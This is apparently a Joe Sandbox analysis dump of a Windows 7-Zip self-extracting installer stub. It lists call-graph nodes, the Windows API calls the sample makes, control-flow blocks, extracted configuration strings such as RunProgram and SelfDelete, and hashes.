API calls 10449->10450 10451 4071a7 10450->10451 10451->9728 8032 40f3f1 8035 4024e7 8032->8035 8040 40245a 8035->8040 8038 4024f5 8039 4024f6 malloc 8041 40246a 8040->8041 8047 402466 8040->8047 8042 40247a GlobalMemoryStatusEx 8041->8042 8041->8047 8043 402488 8042->8043 8042->8047 8043->8047 8048 401f9d 8043->8048 8047->8038 8047->8039 8049 401fb4 8048->8049 8050 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8049->8050 8051 401fdb 8049->8051 8052 402095 SetLastError 8050->8052 8053 40201d ??2@YAPAXI GetEnvironmentVariableW 8050->8053 8068 407717 8051->8068 8052->8051 8058 4020ac 8052->8058 8054 40204c GetLastError 8053->8054 8067 40207e ??3@YAXPAX 8053->8067 8055 402052 8054->8055 8054->8067 8061 402081 8055->8061 8062 40205c lstrcmpiW 8055->8062 8057 4020cb lstrlenA ??2@YAPAXI 8059 402136 MultiByteToWideChar 8057->8059 8060 4020fc GetLocaleInfoW 8057->8060 8058->8057 8075 401f47 8058->8075 8059->8051 8060->8059 8065 402123 _wtol 8060->8065 8061->8052 8066 40206b ??3@YAXPAX 8062->8066 8062->8067 8064 4020c1 8064->8057 8065->8059 8066->8061 8067->8061 8082 40661a 8068->8082 8071 40773c IsBadReadPtr 8073 40774e 8071->8073 8086 4073d1 8073->8086 8076 401f51 GetUserDefaultUILanguage 8075->8076 8077 401f95 8075->8077 8078 401f72 GetSystemDefaultUILanguage 8076->8078 8079 401f6e 8076->8079 8077->8064 8078->8077 8080 401f7e GetSystemDefaultLCID 8078->8080 8079->8064 8080->8077 8081 401f8e 8080->8081 8081->8077 8083 406643 8082->8083 8084 40666f IsWindow 8082->8084 8083->8084 8085 40664b GetSystemMetrics GetSystemMetrics 8083->8085 8084->8071 8084->8073 8085->8084 8087 4073e0 8086->8087 8088 407444 8086->8088 8087->8088 8098 4024fc 8087->8098 8088->8047 8090 4073f1 8091 4024fc 2 API calls 8090->8091 8092 4073fc 8091->8092 8102 403b7f 8092->8102 8095 403b7f 19 API calls 8096 40740e ??3@YAXPAX ??3@YAXPAX 8095->8096 8096->8088 8099 402513 8098->8099 8111 40112b 8099->8111 8101 40251e 8101->8090 8175 403880 8102->8175 8104 403b59 8116 40393b 8104->8116 8106 403b69 8139 4039f6 8106->8139 8108 403b74 8162 4027c7 8108->8162 8112 401177 8111->8112 8113 401139 ??2@YAPAXI 8111->8113 8112->8101 8113->8112 8115 40115a 8113->8115 8114 40116f ??3@YAXPAX 8114->8112 8115->8114 8115->8115 8198 401411 8116->8198 8120 403954 8205 40254d 8120->8205 8122 403961 8123 4024fc 2 API calls 8122->8123 8124 40396e 8123->8124 8209 403805 8124->8209 8127 401362 2 API calls 8128 403992 8127->8128 8129 40254d 2 API calls 8128->8129 8130 40399f 8129->8130 8131 4024fc 2 API calls 8130->8131 8132 4039ac 8131->8132 8133 403805 3 API calls 8132->8133 8134 4039bc ??3@YAXPAX 8133->8134 8135 4024fc 2 API calls 8134->8135 8136 4039d3 8135->8136 8137 403805 3 API calls 8136->8137 8138 4039e2 ??3@YAXPAX ??3@YAXPAX 8137->8138 8138->8106 8140 401411 2 API calls 8139->8140 8141 403a04 8140->8141 8142 401362 2 API calls 8141->8142 8143 403a0f 8142->8143 8144 40254d 2 API calls 8143->8144 8145 403a1c 8144->8145 8146 4024fc 2 API calls 8145->8146 8147 403a29 8146->8147 8148 403805 3 API calls 8147->8148 8149 403a39 ??3@YAXPAX 8148->8149 8150 401362 2 API calls 8149->8150 8151 403a4d 8150->8151 8152 40254d 2 API calls 8151->8152 8153 403a5a 8152->8153 8154 4024fc 2 API calls 8153->8154 8155 403a67 8154->8155 8156 403805 3 API calls 8155->8156 8157 403a77 ??3@YAXPAX 8156->8157 8158 4024fc 2 API calls 8157->8158 8159 403a8e 8158->8159 8160 403805 3 API calls 8159->8160 8161 403a9d ??3@YAXPAX ??3@YAXPAX 8160->8161 8161->8108 8163 401411 2 API calls 8162->8163 8164 4027d5 8163->8164 8165 4027e5 ExpandEnvironmentStringsW 8164->8165 8166 40112b 2 API calls 8164->8166 8167 402809 8165->8167 8168 4027fe ??3@YAXPAX 8165->8168 8166->8165 8234 402535 8167->8234 8169 402840 8168->8169 8169->8095 8172 402824 8173 401362 2 API calls 8172->8173 8174 402838 ??3@YAXPAX 8173->8174 8174->8169 8176 401411 2 API calls 8175->8176 8177 40388e 8176->8177 8178 401362 2 API calls 8177->8178 8179 403899 8178->8179 8180 40254d 2 API calls 8179->8180 8181 4038a6 8180->8181 8182 4024fc 2 API calls 8181->8182 8183 4038b3 8182->8183 8184 403805 3 API calls 8183->8184 8185 4038c3 ??3@YAXPAX 8184->8185 8186 401362 2 API calls 8185->8186 8187 4038d7 8186->8187 8188 40254d 2 API calls 8187->8188 8189 4038e4 8188->8189 8190 4024fc 2 API calls 8189->8190 8191 4038f1 8190->8191 8192 403805 3 API calls 8191->8192 8193 403901 ??3@YAXPAX 8192->8193 8194 4024fc 2 API calls 8193->8194 8195 403918 8194->8195 8196 403805 3 API calls 8195->8196 8197 403927 ??3@YAXPAX ??3@YAXPAX 8196->8197 8197->8104 8199 40112b 2 API calls 8198->8199 8200 401425 8199->8200 8201 401362 8200->8201 8202 40136e 8201->8202 8204 401380 8201->8204 8203 40112b 2 API calls 8202->8203 8203->8204 8204->8120 8206 40255a 8205->8206 8214 401398 8206->8214 8208 402565 8208->8122 8210 40381b 8209->8210 8211 403817 ??3@YAXPAX 8209->8211 8210->8211 8218 4026b1 8210->8218 8222 402f96 8210->8222 8211->8127 8215 4013dc 8214->8215 8216 4013ac 8214->8216 8215->8208 8217 40112b 2 API calls 8216->8217 8217->8215 8219 4026c7 8218->8219 8220 4026db 8219->8220 8226 402346 memmove 8219->8226 8220->8210 8223 402fa5 8222->8223 8225 402fbe 8223->8225 8227 4026e6 8223->8227 8225->8210 8226->8220 8228 4026f6 8227->8228 8229 401398 2 API calls 8228->8229 8230 402702 8229->8230 8233 402346 memmove 8230->8233 8232 40270f 8232->8225 8233->8232 8235 402541 8234->8235 8236 402547 ExpandEnvironmentStringsW 8234->8236 8237 40112b 2 API calls 8235->8237 8236->8172 8237->8236 11181 40e4f9 11182 40e516 11181->11182 11183 40e506 11181->11183 11186 40de46 11183->11186 11189 401b1f VirtualFree 11186->11189 11188 40de81 ??3@YAXPAX 11188->11182 11189->11188
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                                                          • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                                                          • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                                                          • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                                                          • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                                                                          • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                                                          • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                                        • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                                                                                        • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                                                                          • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                                          • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                                          • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                                          • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                                          • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                                                                          • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                                                                                        • _wtol.MSVCRT ref: 0040509F
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                                                                                        • _wtol.MSVCRT ref: 00405217
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                                                                                          • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                                          • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                                          • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                                                                          • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                                          • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                                          • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                                          • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                                          • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                                                                          • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                                                                          • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                                                                          • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                                                                          • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                                                                                        • wsprintfW.USER32 ref: 00405595
                                                                                                        • _wtol.MSVCRT ref: 004057DE
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                                                                                        • CoInitialize.OLE32(00000000), ref: 004059E9
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                                                                                        • GetKeyState.USER32(00000010), ref: 00405AA1
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                                                                        • memset.MSVCRT ref: 004060AE
                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                                                                          • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                          • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                          • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                          • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                          • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                          • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                          • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                          • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                          • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                          • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                          • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                                                                        • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                                                                        • _wtol.MSVCRT ref: 00405F65
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                                                                        • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                                                                                        • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                                                                        • API String ID: 154539431-3058303289
                                                                                                        • Opcode ID: 08cc341054d9ac392e10eec1814b986470a164428fc6d59b7780bfb12bfe5330
                                                                                                        • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                                                                        • Opcode Fuzzy Hash: 08cc341054d9ac392e10eec1814b986470a164428fc6d59b7780bfb12bfe5330
                                                                                                        • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 651 401f9d-401fb2 652 401fd0-401fd9 651->652 653 401fb4 651->653 654 401fe5-40201b GetLastError wsprintfW GetEnvironmentVariableW GetLastError 652->654 655 401fdb-401fe0 652->655 656 401fb9-401fbe 653->656 658 402095-4020a6 SetLastError 654->658 659 40201d-40204a ??2@YAPAXI@Z GetEnvironmentVariableW 654->659 657 402157-40215a 655->657 656->652 660 401fc0-401fce 656->660 663 402156 658->663 664 4020ac-4020ba 658->664 661 40208c 659->661 662 40204c-402050 GetLastError 659->662 660->652 660->656 666 40208f ??3@YAXPAX@Z 661->666 662->661 665 402052-40205a 662->665 663->657 667 4020cb-4020fa lstrlenA ??2@YAPAXI@Z 664->667 668 4020bc-4020c7 call 401f47 664->668 671 402081-40208a 665->671 672 40205c-402069 lstrcmpiW 665->672 673 402094 666->673 669 402136-402150 MultiByteToWideChar 667->669 670 4020fc-402121 GetLocaleInfoW 667->670 668->667 679 4020c9 668->679 669->663 670->669 676 402123-402131 _wtol 670->676 671->658 677 40206b-40207c ??3@YAXPAX@Z 672->677 678 40207e-40207f 672->678 673->658 676->669 677->673 678->666 679->667
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                        • wsprintfW.USER32 ref: 00401FFD
                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                        • GetLastError.KERNEL32 ref: 00402017
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                        • GetLastError.KERNEL32 ref: 0040204C
                                                                                                        • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                        • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                        • _wtol.MSVCRT ref: 0040212A
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
